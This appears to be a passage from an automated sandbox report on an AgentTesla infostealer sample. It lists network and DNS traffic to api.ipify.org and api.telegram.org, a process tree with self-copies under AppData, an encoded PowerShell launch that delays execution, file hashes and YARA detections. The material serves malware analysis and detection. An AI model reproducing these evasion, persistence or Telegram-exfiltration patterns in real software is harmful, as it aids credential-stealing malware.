Mar 20, 2023 19:39:26.260768890 CET  443          49700      104.237.62.211   192.168.2.4
Mar 20, 2023 19:39:26.260880947 CET  49700        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:39:26.265906096 CET  49700        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:39:26.265940905 CET  443          49700      104.237.62.211   192.168.2.4
Mar 20, 2023 19:39:26.266740084 CET  443          49700      104.237.62.211   192.168.2.4
Mar 20, 2023 19:39:26.386190891 CET  49700        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:39:26.640167952 CET  49700        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:39:26.640227079 CET  443          49700      104.237.62.211   192.168.2.4
Mar 20, 2023 19:39:26.808101892 CET  443          49700      104.237.62.211   192.168.2.4
Mar 20, 2023 19:39:26.808207035 CET  443          49700      104.237.62.211   192.168.2.4
Mar 20, 2023 19:39:26.808506012 CET  49700        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:39:26.810086012 CET  49700        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:39:50.165476084 CET  49702        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:39:50.165545940 CET  443          49702      149.154.167.220  192.168.2.4
Mar 20, 2023 19:39:50.165632010 CET  49702        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:39:50.166136980 CET  49702        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:39:50.166155100 CET  443          49702      149.154.167.220  192.168.2.4
Mar 20, 2023 19:39:50.230001926 CET  443          49702      149.154.167.220  192.168.2.4
Mar 20, 2023 19:39:50.230119944 CET  49702        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:39:50.232402086 CET  49702        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:39:50.232420921 CET  443          49702      149.154.167.220  192.168.2.4
Mar 20, 2023 19:39:50.232748985 CET  443          49702      149.154.167.220  192.168.2.4
Mar 20, 2023 19:39:50.234488010 CET  49702        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:39:50.234508991 CET  443          49702      149.154.167.220  192.168.2.4
Mar 20, 2023 19:39:50.282051086 CET  443          49702      149.154.167.220  192.168.2.4
Mar 20, 2023 19:39:50.282367945 CET  49702        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:39:50.282392025 CET  443          49702      149.154.167.220  192.168.2.4
Mar 20, 2023 19:39:50.449218988 CET  443          49702      149.154.167.220  192.168.2.4
Mar 20, 2023 19:39:50.449340105 CET  443          49702      149.154.167.220  192.168.2.4
Mar 20, 2023 19:39:50.449481964 CET  49702        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:39:50.759490013 CET  49702        443        192.168.2.4      149.154.167.220
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Mar 20, 2023 19:38:19.534012079 CET  50911        53         192.168.2.4  8.8.8.8
Mar 20, 2023 19:38:19.553659916 CET  53           50911      8.8.8.8      192.168.2.4
Mar 20, 2023 19:38:19.561065912 CET  59683        53         192.168.2.4  8.8.8.8
Mar 20, 2023 19:38:19.580924988 CET  53           59683      8.8.8.8      192.168.2.4
Mar 20, 2023 19:38:26.481441975 CET  64167        53         192.168.2.4  8.8.8.8
Mar 20, 2023 19:38:26.498725891 CET  53           64167      8.8.8.8      192.168.2.4
Mar 20, 2023 19:39:25.449285030 CET  52239        53         192.168.2.4  8.8.8.8
Mar 20, 2023 19:39:25.469089985 CET  53           52239      8.8.8.8      192.168.2.4
Mar 20, 2023 19:39:25.475931883 CET  56807        53         192.168.2.4  8.8.8.8
Mar 20, 2023 19:39:25.498383999 CET  53           56807      8.8.8.8      192.168.2.4
Mar 20, 2023 19:39:47.851300955 CET  61007        53         192.168.2.4  8.8.8.8
Mar 20, 2023 19:39:47.876548052 CET  53           61007      8.8.8.8      192.168.2.4
Mar 20, 2023 19:39:47.912009001 CET  60686        53         192.168.2.4  8.8.8.8
Mar 20, 2023 19:39:47.930107117 CET  53           60686      8.8.8.8      192.168.2.4
Mar 20, 2023 19:39:50.132524967 CET  61124        53         192.168.2.4  8.8.8.8
Mar 20, 2023 19:39:50.152019978 CET  53           61124      8.8.8.8      192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 20, 2023 19:38:19.534012079 CET | 192.168.2.4 | 8.8.8.8 | 0x8136 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:38:19.561065912 CET | 192.168.2.4 | 8.8.8.8 | 0xdac7 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:38:26.481441975 CET | 192.168.2.4 | 8.8.8.8 | 0xcca0 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:39:25.449285030 CET | 192.168.2.4 | 8.8.8.8 | 0x51a8 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:39:25.475931883 CET | 192.168.2.4 | 8.8.8.8 | 0x749d | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:39:47.851300955 CET | 192.168.2.4 | 8.8.8.8 | 0x296d | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:39:47.912009001 CET | 192.168.2.4 | 8.8.8.8 | 0x3d84 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:39:50.132524967 CET | 192.168.2.4 | 8.8.8.8 | 0x85fb | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 20, 2023 19:38:19.553659916 CET | 8.8.8.8 | 192.168.2.4 | 0x8136 | No error (0) | api.ipify.org | api4.ipify.org | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 19:38:19.553659916 CET | 8.8.8.8 | 192.168.2.4 | 0x8136 | No error (0) | api4.ipify.org | - | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:38:19.553659916 CET | 8.8.8.8 | 192.168.2.4 | 0x8136 | No error (0) | api4.ipify.org | - | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:38:19.553659916 CET | 8.8.8.8 | 192.168.2.4 | 0x8136 | No error (0) | api4.ipify.org | - | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:38:19.580924988 CET | 8.8.8.8 | 192.168.2.4 | 0xdac7 | No error (0) | api.ipify.org | api4.ipify.org | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 19:38:19.580924988 CET | 8.8.8.8 | 192.168.2.4 | 0xdac7 | No error (0) | api4.ipify.org | - | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:38:19.580924988 CET | 8.8.8.8 | 192.168.2.4 | 0xdac7 | No error (0) | api4.ipify.org | - | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:38:19.580924988 CET | 8.8.8.8 | 192.168.2.4 | 0xdac7 | No error (0) | api4.ipify.org | - | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:38:26.498725891 CET | 8.8.8.8 | 192.168.2.4 | 0xcca0 | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:39:25.469089985 CET | 8.8.8.8 | 192.168.2.4 | 0x51a8 | No error (0) | api.ipify.org | api4.ipify.org | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 19:39:25.469089985 CET | 8.8.8.8 | 192.168.2.4 | 0x51a8 | No error (0) | api4.ipify.org | - | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:39:25.469089985 CET | 8.8.8.8 | 192.168.2.4 | 0x51a8 | No error (0) | api4.ipify.org | - | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:39:25.469089985 CET | 8.8.8.8 | 192.168.2.4 | 0x51a8 | No error (0) | api4.ipify.org | - | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:39:25.498383999 CET | 8.8.8.8 | 192.168.2.4 | 0x749d | No error (0) | api.ipify.org | api4.ipify.org | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 19:39:25.498383999 CET | 8.8.8.8 | 192.168.2.4 | 0x749d | No error (0) | api4.ipify.org | - | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:39:25.498383999 CET | 8.8.8.8 | 192.168.2.4 | 0x749d | No error (0) | api4.ipify.org | - | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:39:25.498383999 CET | 8.8.8.8 | 192.168.2.4 | 0x749d | No error (0) | api4.ipify.org | - | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:39:47.876548052 CET | 8.8.8.8 | 192.168.2.4 | 0x296d | No error (0) | api.ipify.org | api4.ipify.org | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 19:39:47.876548052 CET | 8.8.8.8 | 192.168.2.4 | 0x296d | No error (0) | api4.ipify.org | - | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:39:47.876548052 CET | 8.8.8.8 | 192.168.2.4 | 0x296d | No error (0) | api4.ipify.org | - | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:39:47.876548052 CET | 8.8.8.8 | 192.168.2.4 | 0x296d | No error (0) | api4.ipify.org | - | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:39:47.930107117 CET | 8.8.8.8 | 192.168.2.4 | 0x3d84 | No error (0) | api.ipify.org | api4.ipify.org | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 19:39:47.930107117 CET | 8.8.8.8 | 192.168.2.4 | 0x3d84 | No error (0) | api4.ipify.org | - | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:39:47.930107117 CET | 8.8.8.8 | 192.168.2.4 | 0x3d84 | No error (0) | api4.ipify.org | - | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:39:47.930107117 CET | 8.8.8.8 | 192.168.2.4 | 0x3d84 | No error (0) | api4.ipify.org | - | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 19:39:50.152019978 CET | 8.8.8.8 | 192.168.2.4 | 0x85fb | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• api.ipify.org
• api.telegram.org
Target ID: 0
Start time: 19:37:41
Start date: 20/03/2023
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\file.exe
Imagebase: 0x680000
File size: 1825280 bytes
MD5 hash: 2DDEC3A033A6DED2EC135BB2F3EC897D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation: low

Target ID: 1
Start time: 19:37:49
Start date: 20/03/2023
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Imagebase: 0xd30000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 2
Start time: 19:37:49
Start date: 20/03/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c72c0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 3
Start time: 19:38:14
Start date: 20/03/2023
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\Desktop\file.exe
Imagebase: 0x120000
File size: 1825280 bytes
MD5 hash: 2DDEC3A033A6DED2EC135BB2F3EC897D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Target ID: 4
Start time: 19:38:15
Start date: 20/03/2023
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\file.exe
Imagebase: 0x810000
File size: 1825280 bytes
MD5 hash: 2DDEC3A033A6DED2EC135BB2F3EC897D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.618527573.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

Target ID: 5
Start time: 19:38:26
Start date: 20/03/2023
Path: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
Imagebase: 0xb0000
File size: 1825280 bytes
MD5 hash: 2DDEC3A033A6DED2EC135BB2F3EC897D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 36%, ReversingLabs
• Detection: 44%, Virustotal
Reputation: low

Target ID: 8
Start time: 19:38:35
Start date: 20/03/2023
Path: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
Imagebase: 0xff0000
File size: 1825280 bytes
MD5 hash: 2DDEC3A033A6DED2EC135BB2F3EC897D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 36%, ReversingLabs
Reputation: low

Target ID: 9
Start time: 19:38:45
Start date: 20/03/2023
Path: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
Imagebase: 0xf20000
File size: 1825280 bytes
MD5 hash: 2DDEC3A033A6DED2EC135BB2F3EC897D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Reputation: low

Target ID: 10
Start time: 19:38:48
Start date: 20/03/2023
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Imagebase: 0xd30000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 11
Start time: 19:38:48
Start date: 20/03/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c72c0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

Target ID: 12
Start time: 19:38:55
Start date: 20/03/2023
Path: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
Imagebase: 0x840000
File size: 1825280 bytes
MD5 hash: 2DDEC3A033A6DED2EC135BB2F3EC897D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Reputation: low

Target ID: 13
Start time: 19:39:16
Start date: 20/03/2023
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Imagebase: 0xd30000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 14
Start time: 19:39:16
Start date: 20/03/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c72c0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language

Target ID: 15
Start time: 19:39:21
Start date: 20/03/2023
Path: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
Imagebase: 0x670000
File size: 1825280 bytes
MD5 hash: 2DDEC3A033A6DED2EC135BB2F3EC897D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET

Target ID: 19
Start time: 19:39:45
Start date: 20/03/2023
Path: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
Imagebase: 0xf20000
File size: 1825280 bytes
MD5 hash: 2DDEC3A033A6DED2EC135BB2F3EC897D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.616219501.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

No disassembly